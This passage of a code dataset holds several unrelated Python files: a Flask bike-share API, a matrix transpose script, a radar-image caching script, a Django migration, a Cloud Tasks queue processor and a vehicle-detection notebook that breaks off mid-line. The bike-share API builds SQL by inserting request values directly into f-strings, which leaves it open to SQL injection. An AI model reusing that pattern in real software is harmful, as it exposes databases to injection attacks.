req['age']\n    address = req['address']\n\n    return (f'''Hello {name}, your age is {age}, and your address is {address}\n            ''')\n\n# Functions\ndef get_all_stations(conn):\n    query = f\"\"\"SELECT * FROM stations\"\"\"\n    result = pd.read_sql_query(query, conn)\n    return result\n\ndef make_connection():\n    connection = sqlite3.connect('austin_bikeshare.db')\n    return connection\n\ndef get_station_id(station_id, conn):\n    query = f\"\"\"SELECT * FROM stations WHERE station_id = {station_id}\"\"\"\n    result = pd.read_sql_query(query, conn)\n    return result\n\ndef get_all_trips(conn):\n    query = f\"\"\"SELECT * FROM trips\"\"\"\n    result = pd.read_sql_query(query, conn)\n    return result\n\ndef get_trip_id(trip_id, conn):\n    query = f\"\"\"SELECT * FROM trips WHERE id = {trip_id}\"\"\"\n    result = pd.read_sql_query(query, conn)\n    return result\n\ndef insert_into_stations(data, conn):\n    query = f\"\"\"INSERT INTO stations values {data}\"\"\"\n    try:\n        conn.execute(query)\n    except:\n        return 'Error'\n    conn.commit()\n    return 'Successful!'\n\ndef insert_into_trips(data, conn):\n    query = f\"\"\"INSERT INTO trips values {data}\"\"\"\n    try:\n        conn.execute(query)\n    except:\n        return 'Error'\n    conn.commit()\n    return 'Successful!'\n\ndef get_avg_duration_trips(conn):\n    query = f\"\"\"\n    SELECT start_station_name, avg(duration_minutes) as avg_duration_minutes\n    FROM trips\n    GROUP BY start_station_name\"\"\"\n    result = pd.read_sql_query(query, conn)\n    return result\n\ndef get_avg_duration_by_id(bike_id,conn):\n    query = f\"\"\"\n    SELECT bikeid, avg(duration_minutes) as avg_duration_minutes\n    FROM trips\n    WHERE bikeid = {'\"'+bike_id+'\"'}\n    \"\"\"\n    result = pd.read_sql_query(query, conn)\n    return result\n\nif __name__ == '__main__':\n    app.run(debug=True, port=5000)","repo_name":"jfachrel/Bike-Sharing-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"12531559245","text":"import numpy\ndef matrizTranspuesta():\n    # ask the user for the number of rows of the matrices\n    col = int(input(\"NUMBER OF ROWS:\"))\n    # ask the user for the number of columns of the matrices\n    row = int(input(\"NUMBER OF COLUMNS:\"))\n    # declare the first matrix with the number of rows and columns given by the user\n    matriz1 = [[0 for x in range(row)] for y in range(col)]\n    print(\"FIRST MATRIX\")\n    # use a loop to ask for the values of the first matrix\n    for i in range(col):\n        for j in range(row):\n            matriz1[i][j] = float(input(\"Value[\" + str(i) + \"][\" + str(j) + \"]:\"))\n    print(\"Original matrix:\")\n    for i in matriz1:\n        print(i)\n    row = len(matriz1)\n    col = len(matriz1[0])\n    return [[matriz1[j][i] for j in range(row)] for i in range(col)]\n\nmat=matrizTranspuesta()\nprint(\"Transposed matrix: \")\nfor i in mat:\n    print(i)","repo_name":"alexact/metodosnumericosbackend","sub_path":"matrices/matrices/matrizTranspuesta.py","file_name":"matrizTranspuesta.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"2351076862","text":"\"\"\"Cache NEXRAD composites for the website.\"\"\"\nimport tempfile\nimport os\nimport subprocess\nimport sys\n\nimport requests\nfrom pyiem.util import get_dbconn, exponential_backoff, utc, logger\n\nLOG = logger()\nN0QBASE = utc(2010, 11, 14)\n\n\ndef save(sectorName, file_name, dir_name, ts, bbox=None, routes=\"ac\"):\n    \"\"\" Get an image and write it 
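# --- Editor's note: illustrative sketch, not part of the original file. ---
# The f-string queries above (e.g. WHERE station_id = {station_id}) splice a
# URL value straight into SQL, which invites SQL injection. sqlite3 and
# pandas.read_sql_query both accept bound parameters; a self-contained toy:
import sqlite3
import pandas as pd
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE stations (station_id INTEGER, name TEXT)')
conn.execute("INSERT INTO stations VALUES (1, '5th & Bowie')")
df = pd.read_sql_query('SELECT * FROM stations WHERE station_id = ?',
                       conn, params=(1,))  # the value is bound, never spliced
print(df)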
back to LDM for archiving \"\"\"\n tstamp = ts.strftime(\"%Y%m%d%H%M\")\n nexrad = \"nexrad\" if ts < N0QBASE else \"n0q\"\n layers = (\n \"layers[]=%s&layers[]=watch_by_county&layers[]=sbw&\"\n \"layers[]=uscounties\"\n ) % (nexrad,)\n if sectorName == \"conus\":\n layers = (\n \"layers[]=%s&layers[]=watch_by_county&layers[]=uscounties\"\n ) % (nexrad,)\n uri = (\"http://iem.local/GIS/radmap.php?sector=%s&ts=%s&%s\") % (\n sectorName,\n tstamp,\n layers,\n )\n if bbox is not None:\n uri = (\"http://iem.local/GIS/radmap.php?bbox=%s&ts=%s&%s\") % (\n bbox,\n tstamp,\n layers,\n )\n req = exponential_backoff(requests.get, uri, timeout=60)\n LOG.debug(uri)\n if req is None or req.status_code != 200:\n LOG.info(\"%s failure\", uri)\n return\n\n tmpfd = tempfile.NamedTemporaryFile(delete=False)\n tmpfd.write(req.content)\n tmpfd.close()\n\n cmd = (\"pqinsert -p 'plot %s %s %s %s/n0r_%s_%s.png \" \"png' %s\") % (\n routes,\n tstamp,\n file_name,\n dir_name,\n tstamp[:8],\n tstamp[8:],\n tmpfd.name,\n )\n subprocess.call(cmd, shell=True)\n os.unlink(tmpfd.name)\n\n\ndef runtime(ts):\n \"\"\" Actually run for a time \"\"\"\n pgconn = get_dbconn(\"postgis\")\n pcursor = pgconn.cursor()\n\n save(\"conus\", \"uscomp.png\", \"usrad\", ts)\n save(\"iem\", \"mwcomp.png\", \"comprad\", ts)\n for i in [\"lot\", \"ict\", \"sd\", \"hun\"]:\n save(i, \"%scomp.png\" % (i,), \"%srad\" % (i,), ts)\n\n # Now, we query for watches.\n pcursor.execute(\n \"\"\"\n select sel, ST_xmax(geom), ST_xmin(geom),\n ST_ymax(geom), ST_ymin(geom) from watches_current\n ORDER by issued DESC\n \"\"\"\n )\n for row in pcursor:\n xmin = float(row[2]) - 0.75\n ymin = float(row[4]) - 0.75\n xmax = float(row[1]) + 0.75\n ymax = float(row[3]) + 1.5\n bbox = \"%s,%s,%s,%s\" % (xmin, ymin, xmax, ymax)\n sel = row[0].lower()\n save(\"custom\", \"%scomp.png\" % (sel,), \"%srad\" % (sel,), ts, bbox)\n\n\ndef main(argv):\n \"\"\"Go Main Go\"\"\"\n ts = utc()\n if len(argv) == 6:\n ts = utc(\n int(argv[1]),\n int(argv[2]),\n int(argv[3]),\n int(argv[4]),\n int(argv[5]),\n )\n runtime(ts)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"stormchas4/iem","sub_path":"scripts/dl/radar_composite.py","file_name":"radar_composite.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"22581337371","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"twitter\", \"0008_remove_user_twitter_id_str\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"account\",\n name=\"last_fetch_id\",\n field=models.BigIntegerField(\n help_text=b\"The Twitter ID of the most recent Tweet fetched.\",\n null=True,\n blank=True,\n ),\n ),\n ]\n","repo_name":"philgyford/django-ditto","sub_path":"ditto/twitter/migrations/0009_account_last_fetch_id.py","file_name":"0009_account_last_fetch_id.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"29"} +{"seq_id":"25928593303","text":"from dataclasses import dataclass\nimport itertools\nimport json\nimport logging\nfrom time import sleep\nimport typing\nfrom typing import Generator\n\nfrom google.cloud.tasks_v2 import CloudTasksClient\nfrom google.cloud.tasks_v2.types import Task\n\nfrom pcapi import settings\nfrom pcapi.core.external import batch as batch_operations\nfrom 
pcapi.core.external.attributes.api import get_user_attributes\nfrom pcapi.core.users.models import User\nfrom pcapi.notifications.push import update_users_attributes\nfrom pcapi.notifications.push.backends import batch as batch_backend\n\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass UserTask:\n user_id: int\n task_name: str\n\n\nUsersTaskGenerator = typing.Generator[UserTask, None, None]\n\n\ndef get_users_task_chunks(users_tasks: UsersTaskGenerator, chunk_size: int) -> Generator[list[UserTask], None, None]:\n \"\"\"\n Build chunks of UserTask from UserTask generator\n \"\"\"\n while True:\n chunk = list(itertools.islice(users_tasks, chunk_size))\n if chunk:\n yield chunk\n\n if len(chunk) < chunk_size:\n break\n\n\ndef format_batch_users(users: list[User]) -> list[batch_backend.UserUpdateData]:\n \"\"\"\n Format user data for the request to the Batch API\n \"\"\"\n res = []\n for user in users:\n attributes = batch_operations.format_user_attributes(get_user_attributes(user))\n res.append(batch_backend.UserUpdateData(user_id=str(user.id), attributes=attributes))\n print(f\"{len(res)} users formatted for batch...\")\n return res\n\n\ndef get_client() -> CloudTasksClient:\n return CloudTasksClient()\n\n\ndef fetch_user_ids_from_tasks(client: CloudTasksClient, parent: str) -> UsersTaskGenerator:\n \"\"\"\n Extract user ids from a Cloud Tasks' queue's tasks\n \"\"\"\n request = {\n \"parent\": parent,\n \"response_view\": Task.View.FULL,\n }\n\n for task in client.list_tasks(request=request):\n try:\n payload = json.loads(task.http_request.body)\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to parse task's http request's body\", extra={\"task\": task.name})\n else:\n yield UserTask(user_id=payload[\"user_id\"], task_name=task.name)\n\n\ndef delete_tasks(client: CloudTasksClient, task_names: set[str]) -> set[str]:\n deleted_tasks = set()\n\n for task_name in task_names:\n try:\n client.delete_task(name=task_name)\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to delete task\", extra={\"task\": task_name})\n else:\n deleted_tasks.add(task_name)\n\n print(f\"deleted {len(deleted_tasks)} / {len(task_names)} tasks\")\n return deleted_tasks\n\n\ndef unstack_batch_queue(queue_name: str, chunk_size: int = 1_000, sleep_time: float = 2.0) -> tuple[set[str], set[str]]:\n \"\"\"\n Process update user attributes tasks from Cloud task queue:\n\n * fetch tasks information from a Cloud Task queue,\n * extract user ids from it,\n * call Batch API to update users attributes,\n * delete tasks from the queue.\n\n Notes:\n This function should be called when the queue is paused.\n Check out Google's documentation for more information:\n https://cloud.google.com/python/docs/reference/cloudtasks/latest/google.cloud.tasks_v2.services.cloud_tasks.CloudTasksClient\n\n Args:\n queue_name: queue name (not full path, only the name)\n chunk_size: number of users per request to the Batch API,\n defaults to 1_000 (Batch API's max value accepted)\n sleep_time: sleep time in seconds, between to request to the\n Batch API (avoids spamming the API)\n\n Returns:\n 2-item tuple: 1) set of extracted tasks names, 2) set of deleted\n tasks names. 
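# --- Editor's note: illustrative sketch, not part of the original file. ---
# get_users_task_chunks() above is a generic "chunk a generator" helper:
# itertools.islice pulls at most chunk_size items per pass, and a short final
# chunk signals that the generator is exhausted. The same shape on integers:
import itertools

def chunks(iterable, size):
    it = iter(iterable)
    while True:
        chunk = list(itertools.islice(it, size))
        if chunk:
            yield chunk
        if len(chunk) < size:
            break

print(list(chunks(range(7), 3)))  # [[0, 1, 2], [3, 4, 5], [6]]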
If nothing went wrong, both should be equal.\n    \"\"\"\n    print(\"Starting...\")\n\n    client = get_client()\n    tasks_to_delete = set()\n\n    parent = client.queue_path(settings.GCP_PROJECT, settings.GCP_REGION_CLOUD_TASK, queue_name)\n    for users_task_chunk in get_users_task_chunks(fetch_user_ids_from_tasks(client, parent), chunk_size):\n        try:\n            user_ids = {item.user_id for item in users_task_chunk}\n            users = User.query.filter(User.id.in_(user_ids)).all()\n        except Exception:  # pylint: disable=broad-except\n            logger.exception(\"Failed to fetch users from chunk\", extra={\"chunk_size\": len(users_task_chunk)})\n            continue\n\n        try:\n            batch_users_data = format_batch_users(users)\n            update_users_attributes(batch_users_data)\n        except Exception:  # pylint: disable=broad-except\n            logger.exception(\"Failed to update users attributes\", extra={\"chunk_size\": len(users_task_chunk)})\n            continue\n\n        tasks_to_delete |= {item.task_name for item in users_task_chunk}\n        print(f\"chunk of {len(users_task_chunk)} users... done\")\n\n        sleep(sleep_time)\n\n    deleted_tasks = delete_tasks(client, tasks_to_delete)\n    print(\"End\")\n\n    return tasks_to_delete, deleted_tasks\n","repo_name":"pass-culture/pass-culture-main","sub_path":"api/src/pcapi/scripts/external_users/unstack_batch_cloud_task_queue.py","file_name":"unstack_batch_cloud_task_queue.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"29"}
+{"seq_id":"24132227357","text":"\n# coding: utf-8\n\n# # Self-Driving Car Engineer Nanodegree\n# \n# \n# ## Project: Vehicle Detection and Tracking\n# ***\n\n# ## Model Code\n\n# In[1]:\n\n### Import the libraries\n\nimport numpy as np\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport pickle\nimport os\nimport time\nfrom skimage.feature import hog\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom scipy.ndimage.measurements import label\n\n# Import everything needed to edit/save/watch video clips\nfrom moviepy.editor import VideoFileClip\nfrom IPython.display import HTML\n\nprint(\"done\")\n\n\n# In[2]:\n\n### Build Images Variables\n\n#Vehicle images\nbasedir = 'dataset/vehicles/vehicles/'\nimage_types = os.listdir(basedir)\ncars = []\nfor imtype in image_types:\n    cars.extend(glob.glob(basedir+imtype+'/*'))\n    \nprint('Number of Vehicle Images found:', len(cars))\nwith open(\"cars.txt\", 'w') as f:\n    for fn in cars:\n        f.write(fn+'\\n')\n    \n#Non-vehicle images\nbasedir = 'dataset/non-vehicles/non-vehicles/'\nimage_types = os.listdir(basedir)\nnotcars = []\nfor imtype in image_types:\n    notcars.extend(glob.glob(basedir+imtype+'/*'))\n    \nprint('Number of Non-Vehicle Images found:', len(notcars))\nwith open(\"notcars.txt\", 'w') as f:\n    for fn in notcars:\n        f.write(fn+'\\n')\n    \nprint(\"done\") \n\n\n# In[3]:\n\n### Define Functions\n\n#def convert_color(img, conv='RGB2YCrCb'):\n#    if conv == 'RGB2YCrCb':\n#        return cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n#    if conv == 'BGR2YCrCb':\n#        return cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\n#    if conv == 'RGB2LUV':\n#        return cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n#\n#\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, \n                        vis=False, feature_vec=True):\n    # Call with two outputs if vis==True\n    if vis == True:\n        features, hog_image = hog(img, orientations=orient, 
\n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n # Otherwise call with one output\n else: \n features = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features\n\ndef bin_spatial(img, size=(32, 32)):\n color1 = cv2.resize(img[:,:,0], size).ravel()\n color2 = cv2.resize(img[:,:,1], size).ravel()\n color3 = cv2.resize(img[:,:,2], size).ravel()\n return np.hstack((color1, color2, color3))\n\n## Define a function to compute binned color features \n#def bin_spatial(img, size=(32, 32)):\n# # Use cv2.resize().ravel() to create the feature vector\n# features = cv2.resize(img, size).ravel() \n# # Return the feature vector\n# return features\n \ndef color_hist(img, nbins=32): #bins_range=(0, 256)\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n## Define a function to compute color histogram features \n## NEED TO CHANGE bins_range if reading .png files with mpimg!\n#def color_hist(img, nbins=32, bins_range=(0, 256)):\n# # Compute the histogram of the color channels separately\n# channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n# channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n# channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n# # Concatenate the histograms into a single feature vector\n# hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n# # Return the individual histograms, bin_centers and feature vector\n# return hist_features\n\n# Define a function to extract features from a list of images\n# Have this function call bin_spatial() and color_hist()\ndef extract_features(imgs, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file in imgs:\n file_features = []\n # Read in each one by one\n image = mpimg.imread(file)\n # apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(image) \n\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n file_features.append(spatial_features)\n if hist_feat == True:\n # Apply color_hist()\n hist_features = color_hist(feature_image, nbins=hist_bins)\n file_features.append(hist_features)\n if hog_feat == 
True:\n # Call get_hog_features() with vis=False, feature_vec=True\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True))\n hog_features = np.ravel(hog_features) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n # Append the new feature vector to the features list\n file_features.append(hog_features)\n features.append(np.concatenate(file_features))\n # Return list of feature vectors\n return features\n \n# Define a function that takes an image,\n# start and stop positions in both x and y, \n# window size (x and y dimensions), \n# and overlap fraction (for both x and y)\ndef slide_window(img, x_start_stop=[None, None], y_start_stop=[None, None], \n xy_window=(64, 64), xy_overlap=(0.5, 0.5)):\n # If x and/or y start/stop positions not defined, set to image size\n if x_start_stop[0] == None:\n x_start_stop[0] = 0\n if x_start_stop[1] == None:\n x_start_stop[1] = img.shape[1]\n if y_start_stop[0] == None:\n y_start_stop[0] = 0\n if y_start_stop[1] == None:\n y_start_stop[1] = img.shape[0]\n # Compute the span of the region to be searched \n xspan = x_start_stop[1] - x_start_stop[0]\n yspan = y_start_stop[1] - y_start_stop[0]\n # Compute the number of pixels per step in x/y\n nx_pix_per_step = np.int(xy_window[0]*(1 - xy_overlap[0]))\n ny_pix_per_step = np.int(xy_window[1]*(1 - xy_overlap[1]))\n # Compute the number of windows in x/y\n nx_buffer = np.int(xy_window[0]*(xy_overlap[0]))\n ny_buffer = np.int(xy_window[1]*(xy_overlap[1]))\n nx_windows = np.int((xspan-nx_buffer)/nx_pix_per_step) \n ny_windows = np.int((yspan-ny_buffer)/ny_pix_per_step) \n # Initialize a list to append window positions to\n window_list = []\n # Loop through finding x and y window positions\n # Note: you could vectorize this step, but in practice\n # you'll be considering windows one by one with your\n # classifier, so looping makes sense\n for ys in range(ny_windows):\n for xs in range(nx_windows):\n # Calculate window position\n startx = xs*nx_pix_per_step + x_start_stop[0]\n endx = startx + xy_window[0]\n starty = ys*ny_pix_per_step + y_start_stop[0]\n endy = starty + xy_window[1]\n \n # Append window position to list\n window_list.append(((startx, starty), (endx, endy)))\n # Return the list of windows\n return window_list\n\n# Define a function to draw bounding boxes\ndef draw_boxes(img, bboxes, color=(0, 0, 255), thick=6):\n # Make a copy of the image\n imcopy = np.copy(img)\n # Iterate through the bounding boxes\n for bbox in bboxes:\n # Draw a rectangle given bbox coordinates\n cv2.rectangle(imcopy, bbox[0], bbox[1], color, thick)\n # Return the image copy with boxes drawn\n return imcopy\n\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True, vis=False): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image 
= cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True)) \n else:\n if vis == True:\n hog_features, hog_image = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=True, feature_vec=True)\n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n \n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n if vis == True:\n return np.concatenate(img_features), hog_image\n else:\n return np.concatenate(img_features)\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=0, spatial_feat=True, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = cv2.resize(img[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64)) \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n return on_windows\n\n#plotting multiple images - based on the tutorial\ndef visualize(fig, rows, cols, imgs, titles):\n for i, img in enumerate(imgs):\n plt.subplot(rows, cols, i+1)\n plt.title(i+1)\n img_dims = len(img.shape)\n if img_dims < 3:\n plt.imshow(img, cmap='hot')\n plt.title(titles[i])\n #plt.imsave('output_images/'+titles[i]+'_test.png',img*255)\n #plt.imsave('output_images/'+titles[i]+'_test.png',cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n #plt.imsave('output_images/'+'title'+'_test.png',car_hog_image, cmap='gray')\n #cv2.imwrite('/output_images/' + titles[i] + 
'.png',img)\n else:\n plt.imshow(img)\n plt.title(titles[i])\n #plt.imsave('output_images/'+titles[i]+'_test.png',img*255)\n #plt.imsave('output_images/'+titles[i]+'_test.png',cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n #plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n #cv2.imwrite('output_images/'+titles[i]+'_test.png',img*255)\n #cv2.imwrite('/output_images/' + titles[i] + '.png',img) \n\nprint(\"done\")\n\n\n# In[4]:\n\n# Use HOG on test images\n\nget_ipython().magic(u'matplotlib inline')\n\n#random indices selection\ncar_ind = np.random.randint(0, len(cars))\nnotcar_ind = np.random.randint(0, len(notcars))\n\n#read images\ncar_image = mpimg.imread(cars[car_ind])\nnotcar_image = mpimg.imread(notcars[notcar_ind])\n\n#tweak these parameters and see how the results change.\ncolor_space = 'RGB' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\n#orient = 9 # HOG orientations\norient = 6 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = 0 # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\n\ncar_features, car_hog_image = single_img_features(car_image, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat, vis=True)\nnotcar_features, notcar_hog_image = single_img_features(notcar_image, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat, vis=True)\n\nimages = [car_image, car_hog_image, notcar_image, notcar_hog_image]\ntitles = ['car image', 'car HOG image', 'notcar_image', 'notcar HOG image']\nfig = plt.figure(figsize=(12,3))\nvisualize(fig, 1, 4, images, titles)\nprint(\"done\")\n\nfor i, img in enumerate(images):\n plt.imsave('output_images/'+titles[i]+'_test.png',images[i]*255)\n\n\n# In[5]:\n\n# Train the Model - only on a subset of samples\n\n#tweak these parameters and see how the results change.\n#color_space = 'RGB' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\n#orient = 6 # HOG orientations\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\n#hog_channel = 0 # Can be 0, 1, 2, or \"ALL\"\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\n#spatial_size = (16, 16) # Spatial binning dimensions\nspatial_size = (32, 32) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\n#y_start_stop = [None, None] # Min and max in y to search in slide_window()\n#y_start_stop = [400,656]\n#y_start_stop = [400,724]\n#y_start_stop = [654,656] \n\nt=time.time()\nn_samples = 1000\nrandom_idxs = np.random.randint(0,len(cars), n_samples)\ntest_cars = cars\ntest_notcars = notcars\n#test_cars = np.array(cars)[random_idxs]\n#test_notcars = np.array(notcars)[random_idxs]\n\ncar_features = extract_features(test_cars, color_space=color_space, \n spatial_size=spatial_size, 
hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\nnotcar_features = extract_features(test_notcars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n\nprint(time.time()-t, 'Seconds to compute features...')\n\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X)\n# Apply the scaler to X\nscaled_X = X_scaler.transform(X)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\n#X_train, X_test, y_train, y_test = train_test_split(\n# scaled_X, y, test_size=0.2, random_state=rand_state)\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.1, random_state=rand_state)\n\nprint('Using:',orient,'orientations',pix_per_cell,\n 'pixels per cell and', cell_per_block,'cells per block')\nprint('Feature vector length:', len(X_train[0]))\n# Use a linear SVC \nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n\n\n# In[6]:\n\n# Perform a test on images to see bounding boxes\n\n#%matplotlib inline\nsearchpath = 'test_images/*' \nexample_images = glob.glob(searchpath)\n#searchpath = 'test_images/'\n#example_images = glob.glob(searchpath+'/*')\nimages = []\ntitles = []\n#y_start_stop = [None, None] # Min and max in y to search in slide_window()\ny_start_stop = [400,656]\noverlap = 0.5\n#xy_window = 64\nxy_window = 